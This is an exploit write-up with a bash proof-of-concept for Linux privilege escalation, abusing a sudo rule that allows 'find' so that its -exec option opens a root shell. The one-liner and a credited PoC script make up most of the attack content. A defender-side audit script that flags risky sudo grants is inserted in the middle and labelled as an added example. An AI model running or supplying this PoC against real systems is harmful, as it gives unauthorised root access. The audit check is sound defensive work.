LINUX PRIVILEGE ESCALATION SUDO COMMAND
==============================
What is the exploit?
-----------------
If an attacker cannot get root access directly through any other technique, he might try to compromise one of the users who have SUDO access. Once he has access to a SUDO user, he can basically execute any command with root privileges.
Administrators might allow users to run only a few commands through SUDO rather than all of them, but even with this configuration they can unknowingly introduce vulnerabilities that lead to privilege escalation.
A classic example is assigning SUDO rights to the find command so that another user can search for particular files/logs on the system. The admin might be unaware that the ‘find’ command has parameters for command execution, so an attacker can use it to execute commands with root privileges.
Exploiting misconfigured SUDO rights to get root access
-------------------------------------------------------
$ sudo -l – Prints the commands which we are allowed to run as SUDO
We can run find, cat and python as SUDO. All of these commands run as root when run with SUDO. If we can somehow escape to a shell through any of them, we get root access.
$ sudo find /home -exec sh -i \; – The find command’s -exec parameter can be used for arbitrary code execution.
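A defender-side check for the misconfiguration walked through above, as an added example that is not part of the original PoC: it parses `sudo -l` output and flags grants of the commands this page names. The function names, the sample output and the risky-command list are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: flag sudoers grants that hand out root command execution.
# The risky-command list is an assumption limited to the three commands
# this page names (find, cat, python) plus the ALL wildcard.

audit_sudo_list() {
    # Reads `sudo -l` output on stdin, prints one RISK line per finding.
    awk '
        /may run the following commands/ { in_rules = 1; next }
        !in_rules || !/^[ \t]+\(/ { next }   # only "(runas) ..." rule lines
        {
            line = $0
            sub(/^[ \t]+/, "", line)
            runas = line; sub(/\).*/, ")", runas)      # e.g. "(root)"
            sub(/^\([^)]*\)[ \t]*/, "", line)           # drop the run-as spec
            nopw = (line ~ /NOPASSWD:/) ? " NOPASSWD" : ""
            # drop leading tags such as NOPASSWD: or SETENV:
            while (line ~ /^[A-Z_]+:/) sub(/^[A-Z_]+:[ \t]*/, "", line)
            n = split(line, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                split(cmds[i], words, " ")
                path = words[1]; base = path
                sub(/.*\//, "", base)                   # basename of the command
                why = ""
                if (path == "ALL") why = "any command allowed"
                else if (base == "find") why = "-exec runs arbitrary commands"
                else if (base ~ /^python[0-9.]*$/) why = "interpreter runs arbitrary code"
                else if (base == "cat") why = "reads any file as root"
                if (why != "") printf "RISK %s%s %s: %s\n", runas, nopw, path, why
            }
        }
    '
}

# Constructed sample of `sudo -l` output (user and host names are made up).
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/find, /bin/cat, /usr/bin/python
    (root) /usr/bin/systemctl status nginx
EOF
}

sample_sudo_l | audit_sudo_list    # on a live host: sudo -l | audit_sudo_list
```

The narrowly scoped `systemctl status nginx` rule in the sample is not flagged, which is the shape a reviewed sudoers entry should take instead of a bare grant of find or an interpreter.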
POC CODE
------------
#!/bin/bash
# PoC: open a root shell through a sudo rule that allows find.

# Abort early if sudo is not installed.
if command -v sudo &> /dev/null; then
    echo
    echo "SUDO PRIVILEGE ESCALATION"
    echo
    echo "Coded By Anezatra"
    echo
    echo "[*] Process ready"
    echo "[*] Executing command ..."
    echo "[+] Shell is opened!"
    echo
else
    echo
    echo "[-] Error: 'sudo' command not found. Not vulnerable."
    exit 1
fi

# find's -exec starts sh as root; this needs a sudo rule that permits find.
sudo find /home -exec sh -i \;
if [ $? -ne 0 ]; then
    echo
    echo "[-] Error: The find command encountered an issue."
fi
USAGE
--------
bash poc.sh
References:
Tested on: Ubuntu - Debian Linux
anezatra@gmail.com